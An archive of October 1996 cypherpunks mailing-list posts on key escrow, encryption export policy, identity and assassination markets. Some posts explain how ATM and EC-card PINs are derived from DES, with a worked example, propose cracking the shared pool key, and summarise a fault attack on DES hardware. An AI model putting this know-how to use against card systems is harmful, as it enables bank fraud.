>It would be nice to get some confirmation that PINs are generated using
>a DES encryption of the account number.
>
Actually, there are several methods.  The most common one by far is called
IBM3624.  That uses 12 digits of the Primary Account Number (PAN), which in
most cases is the card number, and encrypts it with DES.  That result is
then "decimalized" to change all hex letters to numbers.  The first n
digits of that result are then used to perform a MOD10 subtract from the
customers selected PIN.  That result is called an offset and is stored on
track 2 of the card, the bank's database or both.

 
                                                     G.C.G.

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 | Geoffrey C. Grabow       |      Great people talk about ideas.       |
 | Oyster Bay, New York     |     Average people talk about things.     |
 | gcg@pb.net               |      Small people talk about people.      |
 |----------------------------------------------------------------------|
 |     PGP 2.6.2 public key available at http://www.pb.net/~wizard      |
 |          and on a plethora of key servers around the world.          |
 |                          Key ID = 0E818EC1                           |
 |   Fingerprint =  A6 7B 67 D7 E9 96 37 7D  E7 16 BD 5E F4 5A B2 E4    |
 |----------------------------------------------------------------------|
 | That which does not kill us, makes us stranger.   - Trevor Goodchild |
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Fri, 18 Oct 1996 01:20:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Stopping Crime" Necessarily Means Invasiveness
Message-ID: <80A3D511B45@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> wrote:
> The recent talk about "catching criminals" misses this point, that
> governments typically use surveillance powers to control citizens. (Note: I
> would think Dutch residents should be especially sensitive to this concern,
> given what happened to them in WW II, when the arriving Nazis used
> telephone records to locate Jews for extermination. Until recently, Holland
> had a tendency to carefully think about such issues---I believe phone calls
> were billed in such a way as to not keep such records, for example).

I suppose this remark is targeted at me and Eric.
Yes, I am sensitive to the issue, but no, I don't think the threat of 
an American invasion particularly realistic.
At present, I worry more about the threat of (organized) crime than 
about the threat of government abuse, call it Dutch naivete if you 
want.

So much for politics. Can we get back to crypto?

Bert-Jaap




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 18 Oct 1996 10:32:27 -0700 (PDT)
To: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Subject: Re: Your editorial in the 10/14 PCWeek
Message-ID: <199610181732.KAA29096@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:55 AM 10/17/96 -0400, Michael Froomkin - U.Miami School of Law wrote:
>On Wed, 16 Oct 1996, Marshall Clow wrote:
>[...]
>> In a paper about privacy and the original Clipper proposal (in 1994) 
>...Jan '95 actually...
>> A. Michael Froomkin of the University of Miami School of Law pointed out
>> that since the entire key-escrow infastructure was created by
>> presidential decree, and the proposed key holders were part of the
>> executive branch, the provisions for release of the keys could be
>> changed at a moment's notice by another presidential decree, which need
>> not ever be made public. [ Yo, key escrow dude! Email your key database
>> to wiretappers@fbi.gov, and don't tell anyone! ]
>
>I still think this is a major issue; it is one, however, that goes away if
>they pass a well-drafted statute.

Are you sure about that?  "If they pass a well-drafted statute," the 
president couldn't just declare a "national emergency" (similar to all of 
the other "national emergencies" we are under right now) and send that same 
message to the key-keepers demanding they send their databases?

Given the massive misbehavior of government in general, I'm not at all 
confident something like this couldn't happen.

I'm waiting for the first indication that these GAK systems will include 
some sort of government-fraud-preventative measures, possibly an irrevocable 
allowance (or even a requirement?) that any key holder can publicize the 
fact of any key request at the time it is made, or after a minimal time like 
a couple of weeks or so.  That way, government abuse of the system would be 
revealed, beyond the control of the government.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 18 Oct 1996 10:23:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Identity is Just Another Credential...
In-Reply-To: <199610181520.IAA05554@crypt>
Message-ID: <v03007802ae8d7b9f42be@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:20 AM -0700 10/18/96, Hal Finney wrote:

>Somehow too it is hard to see how to sell a system as a privacy enhancement
>when its first step is to take fingerprints of the whole country.  "But
>we're not saving your names, honest!"  I don't know if it would fly.
>
>Tim May argues that alternative solutions which are more local will be
>better.  In the case of the abuse situation, maybe you could just have
...

Indeed, I believe "identity is just another credential," not necessarily
very important. I sometimes exaggerate this point a bit by saying, "Your
key is your identity." Carl Ellison made a similar point, yesterday.

(By "identity" I mean the popular notion of unique, biometric, True Name
identity. Other forms of identity exist as well, such as usernames (bound
to passwords), phone numbers, corporate names, etc.)

Identity--the True Name sort--is sometimes useful, but is often given
exaggerated importance.

For example, I've met "Hal Finney," but, for all I know, he's as fictional
a person as "Lucky Green" is. In fact, it was not until fairly recently
that I even learned "Lucky Green" is not his True Name...I had assumed the
"Lucky" part  was a nickname, of course, but that the "Green" part was
real. I  had no reason to suspect otherwise, no need to demand proof of his
True Name (such as things are here in the U.S.), etc.

The "is-a-person" debate is one we should be careful to consider the real
issues for. As Hal (or whomever he is) notes, starting with a comprehensive
data base of True Names, fingerprints, etc., and binding them to
is-a-person credentials is potentially very dangerous.

(And from a libertarian/anarchist point of view, I don't want to pay for
such a Big Brother infrastructure, nor do I think it gets at the real
issues. If identity is just another credential, and the exchange of
credentials is based on mutually agreed-upon arrangements, then mandating
an identity credential is a Bad Thing.)


--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Fri, 18 Oct 1996 01:47:20 -0700 (PDT)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: DES cracker.
In-Reply-To: <Pine.3.89.9610172224.A7082-0100000@netcom9>
Message-ID: <y8apw2gfyqr.fsf@hertie.artcom.de>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Lucky" == Lucky Green <shamrock@netcom.com> writes:

    Lucky> It would be best to attack something that has broader use
    Lucky> than just a single pin. At best, that would allow an
    Lucky> hostile to clean out a single account. A target that would
    Lucky> allow one to attack, say an account held *by* a bank would
    Lucky> be more attractive.

The EC-Card system, the European standard for ATM cards, is based on
DES. A single recovered key would suffice to calculate all PINs every
current EC card, the number of which runs into the tens of millions.

That would be especially interesting considering that peeple in
Germany consistently lost suits against their banks in cases of stolen
EC cards, the courts believed the banks' claim that DES is
unbreakable.

The PIN verification breaks down like this:

On the card (which is a standard ISO magnetic stripe card with some
bells and whistles to detect forgeries) are between others the
following data:

- the account number (10 digits)
- the bank number (8 digits)
- a card serial number (1 digit)
- three offset values (4 digits each)

The last five digits of the bank number, the account number and the
serial number are concatenated. If I had an account at Deutsche Bank,
this could look like this:

- bank number: 10070000
- account number 0004943918
- serial number: 1 (it's my first card).

Concatenation is: 7000000049439181. Now this number is viewed as a hex
number and DES ECB encrypted: res = E(0x7000000049439181).

The 3rd to 6th letter of the result viewed as hex is extracted:

res == 0x8d6b477bd7a83b7c
           vvvv
	   6b47

and every digit is taken modulo 10:

           6b47
           vvvv
           6147

This is basically the PIN, wich is requested from the user and
compared to that value.

Now things get a little complicated. There are different keys used in
the DES encryption, institute keys and pool keys. Every ATM either
tries the institute key, which is specific to the bank owning the ATM,
or, if the card was given out by another bank, a pool key, which is
common to all EC Card vendors. This latter case is where the offset
fields come in play, the contents of the offset field is added to the
encryption result before comparing to the entered PIN. 

I'm citing all this from memory, and I'm a little unsure about the
specific way the offset is added into the result, and about the
presence of three different offset fields. My guess is that the pool
key is changed every year, as the maximum validity for EC Cards is two
years. I'll try to dig out all the details if you consider this target
interesting.

Andreas

-- 
Besides: Simulating reality creates too high a polygon count!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 18 Oct 1996 08:58:52 -0700 (PDT)
To: trei@process.com
Subject: Real Meaning of "Key Recovery" (was Re: DES cracker...)
In-Reply-To: <199610181356.GAA10968@toad.com>
Message-ID: <9610181551.AA00569@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei, whilst talking about a key cracking effort, said:
>  For the Key Recovery effort (please call it Key Recovery  -
>  this has important psychological implications in the US)

Yes yes!  What a great way to "reclaim" this term...  CC'ed to cypherpunks  
for all to see.    No longer is it "Key Cracking" it is now "Key Recovery" ...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 18 Oct 1996 14:13:57 -0700 (PDT)
To: "'James A. Donald'" <jamesd@echeque.com>
Subject: RE: Goodbye
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961018183217Z-2754@mail.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	James A. Donald

The glory days are long past, and cannot be revived
by forming a new mailing list.
.......................................................................


I've never thought of the cypherpunks as being of the mind to "abandon"
the "worthless" masses to their own devices.   Rather, I thought of them
as being of the mind to associate among those who thought like
themselves about privacy, who shared the values of self-reliance, who
supported the ideals of individual liberty, and who were open to
including on the list anyone who wanted to better understand the
subjects which are discussed there.

But that quote above reminds me of the patent office's statement, often
recounted, of how everything which could be invented had already been
invented, and there couldn't possibly be any more new ideas introduced.

It all depends, as usual, on the individuals involved -  on the quality
they bring to the subject, to the list, to the enterprise.

Interesting question:  what do elite sophisticates *do*, once they've
reached their pinnacle?

   ..
Blanc

>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alexander.Kvache" <alexk@hcl.com>
Date: Fri, 18 Oct 1996 08:47:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199610181546.LAA29268@mhinside.hcl.com>
MIME-Version: 1.0
Content-Type: text/plain

unsibscribe


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Fri, 18 Oct 1996 08:47:25 -0700 (PDT)
To: Steve Schear <cypherpunks@toad.com
Subject: Re: is there no end to AP & Creative Wiretap Arguments?
In-Reply-To: <53osds$id2@life.ai.mit.edu>
Message-ID: <3267A7D3.41C6@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Steve Schear wrote:

> How about as a means of coercing war criminals ethnic purgers, as those in
> Bosnia/Serbia, to turn themselves in to proper tribunals for judging.
> Having AP bettors wager $100,000s on your untimely retirement, unless you
> turn yourself in, could induce one to consider conventional justice.

On the other hand it would provide said war criminals with a convenient
mechanism for carrying out their crimes. 

It does not work for Bell and his appologists to wave their hands and
say "trust me it will be better". There is absolutely no reason to
believe that AP markets would be used by anyone but psychopaths. 

No mechanism is proposed which restricts the purposes to which the AP
markets can be put. They would inevitably be used by the KKK and
neo-NAZI groups for hate-crimes.


> All human rights are Naturally derived as are the 'Laws of the Jungle'.
> Governments instituted among men should derive their rights from the
> soverignty of its citizens.  Unfortunately, many countries choose to ignore
> this.  AP should serve an occassionally competitive system to keep the
> 'duly consistuted' system on its toes lest those in authority reap the law
> of the jungle.

Rights do not exist outside a legal framework that supports them.
Arguments
from natural law have been discredited for 300+ years. Such arguments
merely reify the prejudices of one society into axiomatic rights without
the bother of having to justify them. There is no logical basis to
prefer the "rights" of th US constitution over the "rights" recognised
by the Islamic Jihad.

If you read the US declaration of Independence it is very clear that its
authors rejected natural law arguments. The rights that they hold to be
"self evident" are extreemly abstract principles which could be
justified within almost any ethical system. The removal of the word
"God" was deliberate and reflects a concious rejection of the natural
law argument. 


AP is self-contradictory. It claims to uphold "rights" by infringing
them massively and disproportionately and in such a way that no rights
would remain. It is impossible to justify AP except in extreeme
authoritarian terms that could be used to justify any system of
government. 


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 18 Oct 1996 08:55:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Kantor Mischaracterizes
Message-ID: <1.5.4.32.19961018155418.006da56c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, October 18, 1996, p. A26.


   The Administration's Encryption Plan


   I write in response to The Post's Oct. 4 editorial [below]
   that mischaracterizes the administration's recent
   encryption plan.

   The administration's encryption plan is reasonable,
   workable, fair and coherent. It addresses the critical
   issues of promoting the export of encryption products and
   protecting the public safety and our national security. The
   administration's objective is to put forth a balanced plan
   that promotes commerce and protects people. And that's
   exactly what we've done.

   The proof that our plan will work is with the critical mass
   of industry that has announced its intention to work with
   the administration to develop a key recovery system, which
   will allow law enforcement, under proper court order, to
   have access to encrypted data. In fact, many of these
   companies have products they will soon market that both
   safeguard information and protect society, and more are
   expected to follow.

   The National Research Council (NRC) report to which the
   editorial referred recommended allowing the export of
   encryption up to the strength of 56 bits. Contrary to the
   editorial, the president has not "embraced a looser form of
   licensure" than this report. Instead, this administration's
   plan allows the export of encryption up to 56 bits so long
   as industry commits to build and market products that
   support a key recovery system. This is, in fact, a stronger
   form of licensure not called for by the NRC report.

   The Post's editorial conveniently ignores the critical role
   encrypted products play in protecting businesses against
   illegal activity and the privacy rights of individuals.
   This is a disturbing omission that avoids critical concerns
   that can only be advanced by the administration's plan.

   Finally, this administration takes seriously its
   responsibility to protect its citizens and our national
   security. That's why we are not lifting all restrictions on
   the export of encryption products, and why there is a
   two-year deadline on the export of 56-bit encryption
   products. The administration's plan will accelerate the
   development of a market-driven, global key management
   system. That will provide the best security of all.

   Michael Kantor
   Secretary of Commerce
   Washington

   [End]

----------

   The Washington Post, October 4, 1996, p. A22.


   Crypto Politics [Editorial]


   The Clinton administration once had a coherent, if
   unpopular, position on encryption software, the stuff that
   allows you to encode your email messages or other data so
   that no one can read it en route without a key. Now, in the
   wake of word that the president will sign an executive
   order, the position is no longer coherent, nor discernibly
   more popular with the high-tech audience it attempts to
   mollify.

   People and companies doing international financial business
   are highly interested in this kind of software, the more
   powerfully "uncrackable" the better. The U.S. software
   industry thinks there's a lot of money in it, especially if
   encryption becomes routine.

   The administration position till recently was that, much as
   U.S. software companies might profit from being able to
   market "uncrackable" encryption software freely, national
   security and law enforcement considerations dictated that
   such exports be controlled by license. Powerful encryption,
   like arms, could be dangerous in the hands of terrorists,
   rogue governments or international criminals. The software
   was classed as a munition; software above a certain
   uncrackability level could not be exported unless law
   enforcement authorities could get access somehow to the
   "key" after obtaining the proper warrants.

   Unbreakable codes on the loose strike us as a real danger,
   a legitimate reason for tight export controls. But if the
   administration really believes this, you'd think it would
   stick with steps that can plausibly meet the goal of
   control.

   Instead, trying to please, it has been splitting and
   splitting the difference between itself and the largely
   unmoved industry, which argues that no one will buy an
   encryption product that a government can decrypt at will.
   As with arms sales, the companies also argue that if they
   don't sell it, somebody else will, and that anyway it's far
   too late to fence off rogues. The national security people
   respond that there is still a "window," perhaps two years,
   in which they can prevent, if not all leaks of unauthorized
   crypto technology, at least its off-the-shelf use and wide
   adoption as the international standard.

   The administration initially proposed, then repeatedly
   refined, the concept of key "escrow" -- depositing a copy
   of the code with trusted third parties -- but never came up
   with a version the industry would accept. It commissioned
   a National Research Council report, which recommended a
   significant easing of restrictions. Now the president
   appears to have embraced a yet looser form of licensure
   upon declaration by a company that it will develop a plan
   within two years for key recovery. Also, the technology no
   longer will be considered munitions.

   What kind of plan? Nobody can quite say. What if the plans
   aren't acceptable? Licensing will revert to the old rule in
   two years. Will the security issue be moot by then?
   Probably. Barring some burst of clarity, one is left
   wondering whether the administration has compromised or
   caved, and what it now believes about the dangers of
   exporting uncrackable software.

   [End]

   See the National Research Council report:

   http://jya.com/nrcindex.htm












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: everheul@mail.rijnhaave.nl
Date: Fri, 18 Oct 1996 03:57:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE: Binding cryptography - a fraud-detectible alternative to  ke
Message-ID: <199610181057.LAA11997@mail.rijnhaave.nl>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart[SMTP:stewarts@ix.netcom.com] wrote:
>I haven't seen the technical papers behind the postings you've made
Our original is on: http://cwis.kub.nl/~frw/people/koops/binding.htm
At the end of that (also available as
http://cwis.kub.nl/~frw/people/koops/bindtech.htm) there is a
technical description of one implementation of Binding Cryptography. 

>to the net, but the overall approach sounds very similar to "Clipper
>II", the Software Key Encryption work that the TIS people (Steve
>Walker?) and Dorothy Denning were touting a year or so ago.  It
>wasn't in your references, and it's clearly close enough to be worth
>your attention.  The design was interesting - it chose a set of
>public and symmetric key encryption that allows the recipient to
>validate the sessionkey-encrypted-to-key-copy-holder*.
They are mentioned  in the final paper.

/* I will only go into the technique now, not the politics */
In fact our technique is inspired on that technique (that is being
used by several other as well). In this technique users' encrypted
messages basically consist of three components:
1. the (actual) message encrypted with any symmetric system, using a random session
key;
2. the session key encrypted with the public key(s) of the
addressee(s);
3. the session key encrypted with the public key of a

Trusted Retrieval Party (TRP). With the TIS scheme a TRP is called Key
Escrow Agency (KEA), but that is just a name.

When a law-enforcement agency is conducting a lawful intercept and
strikes upon an enciphered message, they take the third information
component to the TRP. If shown an appropriate warrant, the TRP
decrypts the information component and hands over the session key, so
that the law-enforcement agency has access to the message. 

The TIS commerical Key Escrow (CKE) leaves it at that. So unilateral
(i.e without help of the recipient) fraud is easily possible; just
send another (or none) session key in the thrid component. Nobody is
going to know; the three packets look OK. Only when there is a
law-enforcement agency is conducting a lawful intercept then they will
know fraude is committed. (BTW "fraude" means using something
(voluntarily) without complying with the *AGREED* rules. Hence fraude
in voluntary systems is possible. PLEASE PLEASE PLEASE let us not have
that discussion again!). Not willing to jeopardize the investigation,
the LEA is then probably not going to do much about it.

In the "TIS software key escrow paralleling Clipper" this unilateral
fraude has been made impossible: as the recipient knows the session
key (from decrypting the second component), he is capabel to
recalculate the third session key and compare it with it the actual
sent to him. Of course this comparison is incorperated in the software
of the recipient; if the comparison fails then the decryption of the
first component will not take place (in France your monitor might
explode (-;) Although preventing unilateral fraude, this does not
prevent colluding of frauders. Indeed, by a conceptually simple
manipulation in the decryption software the outcome of the comparison
can be made "positive" all the time. So in this fashion, without
anybody knowing (seeing) about it colluding people will use the
security benefits of the system, but not it "law enforcement"
disadvantages.

We liked the general techinque as it is rather liberal and
internationally useable (you don't have to escrow any secret keys, the
choice of TRPs is very flexible), but we did not like the colluding
property. The idea in our scheme is that the colluding fraude is still
possible, but must be at least *detectable* by third parties that have
access to all data anyway (network operators, internet service
providers). Moreover, for this detection no secret information is
needed (or gained), so user' privacy is not jeopardized by it. With
respect to this; I was surprised to read in the papers that Bangemann
(European Commision) proposed to make Internet Service Provides
responsible for checking the authenticity of certain types of sent
data.

In resume: we believe that our scheme is the middle of key-escrow
(Clipper III) and the TIS scheme and is flexible enough to form a
worldwide security infrastructure, where each participating country
can implement its *own* crypto policy with. In particular, if, how
(random, offline?) and by who checking is done is a matter for each
country to decide on his own. Also the organization of TRPs is a
matter of each country of its own.

> A major capability that was missing from Walker's SKE work is the
> ability to split the copied* key into two or more parts, all of
> which are need to recover the session key, while making it possible
> to validate that the pieces do add up to the session key.  

Splitting the session-key in binding data can be done by the sender
(sending all shares to different TRPs); this can be checked by anyone.
More importantly, in our ElGamal implementation of binding
cryptography the splitting of the secret keys of TRP can be done in a
very elegant way, that seems to be put there for (controlled) LEA-use. We will put
that in the technical paper as well.

Best regards, Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 18 Oct 1996 12:31:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Identity is Just Another Credential...
In-Reply-To: <199610181520.IAA05554@crypt>
Message-ID: <v03007800ae8d9ad95478@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 AM -0800 10/18/96, Timothy C. May wrote:

>Indeed, I believe "identity is just another credential," not necessarily
>very important. I sometimes exaggerate this point a bit by saying, "Your
>key is your identity." Carl Ellison made a similar point, yesterday.
>
>(By "identity" I mean the popular notion of unique, biometric, True Name
>identity. Other forms of identity exist as well, such as usernames (bound
>to passwords), phone numbers, corporate names, etc.)

Sorry. By inserting the parenthetical clarification of what I meant by
"identity," I may have confused things.

The "identity" as unique, biometric, True Name form is much different from
the "your identity is your key" form.

While some deep philosophical issues are no doubt involved, all I mean is
that there are different operational definitions. And I have had almost no
need to verify the physical identity of anyone I have ever dealt with,
which tells me something. (Nor does anyone I know ever ask me for proof
that I am Tim May, and not someone else. Occasionally I am asked to flash
my California Driver's License, but that's about it. Much more important is
that I have certain credentials--tickets to theaters, an admission card to
my health club, etc.)

Physical identity just ain't what's it's cracked up to be.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 18 Oct 1996 10:00:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: PIS_son
Message-ID: <1.5.4.32.19961018165938.006d39ec@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-17-96, BuWi:

   "Apple, IBM, JavaSoft, Motorola, Netscape, Nortel, Novell,
   RSA, and Silicon Graphics Announce PICA Crypto-Alliance"

      The PICA specification will also be designed to make the
      task of developing differing domestic and exportable
      security requirements much easier. [GAK alliance 2.]


   PrNe: "World Wide Web Casinos, Inc. Brings Gambling to the
   Internet at www.netpirates.com"

      "Placing bets cannot be illegal because, despite their
      origination, bets will technically be placed on the 
      computers at our off-shore spy-based casino site."


   BuWi: "Cylink Partners with U.S.P.S to Build National 
   Citizen Tracking System to Include Postmarking and 
   Authentication for Legal/Medical Records, Tax Filings"


   PhIn: "Unsuspecting Internet Users' 'Cookie' Files Concern
   Privacy Advocates"

      But look at cookie users another way: You're the hydrant 
      and they're the dogs, marking you for future reference.

   -----

   http://jya.com/pisson.txt  (24 kb for 4)

   ftp://jya.com/pub/incoming/pisson.txt

   PIS_son












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 18 Oct 1996 04:57:40 -0700 (PDT)
To: "Geoffrey C. Grabow" <gcg@pb.net>
Subject: Re: DES cracker.
In-Reply-To: <3.0b36.32.19961018003632.00699af0@mail.pb.net>
Message-ID: <32676FFB.63DECDAD@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Geoffrey C. Grabow wrote:
> 

> Tell me what you need.  A large part of my job is providing hardware
> security modules to banks to secure (among other things) their ATM networks
> (Automated Teller MAchines, not Async Transfer Mode).  Do you need PIN
> encryption formats, transmission message protocols, or what?  Just LMK.

It would be nice to get some confirmation that PINs are generated using
a DES encryption of the account number.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 18 Oct 1996 05:43:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: exporting signatures only/CAPI (was Re: Why not PGP?)
In-Reply-To: <199610121908.OAA19871@homeport.org>
Message-ID: <32677B6C.13728473@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote:
>  
> I remember hearing (if my memory is correct, from the mouth of a Microsoft
> employee at Crypto '96) that when Microsoft signs a module, they are certifying
> that they saw a signed sheet of paper swearing that either
> (1) you won't export the software, or
> (2) you have received an appropriate export license.
> 
> AFAIK, they don't even read the code.

Really?  This implies they would have no objections to signing freely
available code, which as we all know will eventually make its way
overseas (indeed, it may have originated there).

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 18 Oct 1996 12:15:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FYI - Biham/Shamir Differential Fault Analysis of DES, etc.
Message-ID: <199610181910.PAA21724@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message
From: Shamir Adi <shamir@wisdom.weizmann.ac.il>
Date: Fri, 18 Oct 1996 16:30:34 +0200
Message-Id: <199610181430.QAA20359@white.wisdom.weizmann.ac.il>
To: benaloh@microsoft.com, brassard@iro.umontreal.ca,
        canetti@theory.lcs.mit.edu, crepeau@iro.umontreal.ca,
        david@digicash.com, daw@cs.berkeley.edu, mab@research.att.com,
        mihir@watson.ibm.com, rogaway@cs.ucdavis.edu, schneier@counterpane.com
Subject: A new attack on DES


Research announcement: A new cryptanalytic attack on DES


Eli Biham                                 Adi Shamir

Computer Science Dept.                    Applied Math Dept.
The Technion                              The Weizmann Institute
Israel                                    Israel


                 October 18, 1996

                     (DRAFT)

In September 96, Boneh Demillo and Lipton from Bellcore announced an
ingenious new type of cryptanalytic attack which received widespread 
attention (see, e.g., John Markoff's 9/26/96 article in the New 
York Times). Their full paper had not been published so far, but 
Bellcore's press release and the authors' FAQ (available at  
http://www.bellcore.com/PRESS/ADVSRY96/medadv.html) specifically 
state that the attack is applicable only to public key cryptosystems 
such as RSA, and not to secret key algorithms such as the Data Encryption 
Standard (DES). According to Boneh, "The algorithm that we apply to the 
device's faulty computations works against the algebraic structure used
in public key cryptography, and another algorithm will have to be devised 
to work against the nonalgebraic operations that are used in secret key 
techniques." In particular, the original Bellcore attack is based on 
specific algebraic properties of modular arithmetic, and cannot handle 
the complex bit manipulations which underly most secret key algorithms.

In this research announcement, we describe a related attack 
(which we call Differential Fault Analysis, or DFA), and show that 
it is applicable to almost any secret key cryptosystem proposed so far 
in the open literature. In particular, we have actually implemented 
DFA in the case of DES, and demonstrated that under the same 
hardware fault model used by the Bellcore researchers, we can 
extract the full DES key from a sealed tamperproof DES encryptor by 
analysing fewer than 200 ciphertexts generated from unknown cleartexts.
The power of Differential Fault Analysis is demonstrated by the fact 
that even if DES is replaced by triple DES (whose 168 bits of key were 
assumed to make it practically invulnerable), essentially the same attack 
can break it with essentially the same number of given ciphertexts. 

We would like to greatfully acknowledge the pioneering contribution
of Boneh Demillo and Lipton, whose ideas were the starting point of
our new attack. 

In the rest of this research announcement, we provide a short technical
summary of our practical implementation of Differential Fault Analysis of 
DES. Similar attacks against a large number of other secret key cryptosystems
will be described in the full version of our paper.


TECHNICAL DETAILS OF THE ATTACK

The attack follows the Bellcore fundamental assumption that by exposing 
a sealed tamperproof device such as a smart card to certain physical 
effects (e.g., ionizing or microwave radiation), one can induce with 
reasonable probability a fault at a random bit location in one of the 
registers at some random intermediate stage in the cryptographic 
computation. Both the bit location and the round number are unknown 
to the attacker. 

We further assume that the attacker is in physical possesion of the 
tamperproofdevice, so that he can repeat the experiment with
the same cleartext and key but without applying the external
physical effects. As a result, he obtains two ciphertexts derived from
the same (unknown) cleartext and key, where one of the ciphertexts is 
correct and the other is the result of a computation corrupted by a 
single bit error during the computation. For the sake of simplicity,
we assume that one bit of the right half of the data in one of the 16 
rounds of DES is flipped from 0 to 1 or vice versa, and that both the 
bit position and the round number are uniformly distributed.

In the first step of the attack we identify the round in which the 
fault occurred.  This identification is very simple and effective: If 
the fault occurred in the right half of round 16, then only one bit in 
the right half of the ciphertext (before the final permutation) differs
between the two ciphertexts. The left half of the ciphertext can
differ only in output bits of the S box (or two S boxes) to which this
single bit enters, and the difference must be related to non-zero
entries in the difference distribution tables of these S boxes.  In
such a case, we can guess the six key bit of each such S box in the
last round, and discard any value which disagree with the expected
differences of these S boxes (e.g., differential cryptanalysis). On
average, about four possible 6-bit values of the key remain for each
active S box.

If the faults occur in round 15, we can gain information on the key
bits entering more than two S boxes in the last round: the difference
of the right half of the ciphertext equals the output difference of
the F function of round 15.  We guess the single bit fault in round
15, and verify whether it can cause the expected output difference,
and also verify whether the difference of the right half of the
ciphertext can cause the expected difference in the output of the F
function in the last round (e.g., the difference of the left half of
the ciphertext XOR the fault).  If successful, we can discard possible
key values in the last round, according to the expected differences.
We can also analyse the faults in the 14'th round in a similar way.
We use counting methods in order to find the key.  In this case, we
count for each S box separately, and increase the counter by one for
any pair which suggest the six-bit key value by at least one of its
possible faults in either the 14'th, 15'th, or 16'th round.

We have implemented this attack on a personal computer.  Our analysis
program found the whole last subkey given less than 200 ciphertexts,
